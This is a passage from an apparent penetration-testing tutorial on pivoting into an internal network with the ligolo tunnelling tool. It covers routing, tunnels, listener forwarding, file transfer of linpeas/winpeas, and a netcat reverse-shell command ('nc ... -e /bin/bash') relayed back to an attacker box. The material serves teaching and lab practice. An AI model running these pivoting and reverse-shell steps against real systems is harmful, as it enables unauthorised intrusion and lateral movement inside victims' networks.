After that, we will receive the connection back in our attacker box, you can issue a help command to see various functionality the agent can perform.
Routing table -
On attacker box -
# ligolo terminal
$ session - select the session you want to interact
$ ifconfig - list all the available networks in the target box
# bash terminal
$ sudo ip route add 10.10.120.0/24 dev ligolo
$ ip route list - confirm if route is added
after that you can start a tunnel and interact with internal network
in the ligolo terminal -
$ session - list all the connected agents
$ start - select session and start tunnel
after this setup, you can start scanning the internal network.
Obtaining reverse shell of the internal host
what if we need to catch reverse shell coming from internal host, we cannot directly catch the shell as internal network cannot reach out to our attacker box, we will use ligolo agent box to forward our shell back to us.
let's assume we going to execute some type of rce in the internal box ,
# Intenal target box -
- let's say we are crafting payload, in that payload we need to put ligolo agent box ip address and port number.
$ nc 10.10.169.23 4444 -e /bin/bash - here ip address should be ligolo agent box ip
# ligolo terimanl -
now we are going to add listener to forward the traffic to our box,
$ listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:1234
$ nc -lvp 1234 - and we can get shell on port 1234
File Transfer -
let's say we need to transfer scripts to internal boxes like linpeas and winpeas.
# ligolo terminal -
- we can add another listener to forward the traffic back to our attacker box,
$ listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:8000
- now in internal box we can browse to port 7777 with ligolo agent box ip and it will redirect traffic back to attacker box.
- and we can start our python server in our attacker box on port 8000
$ python -m http.server
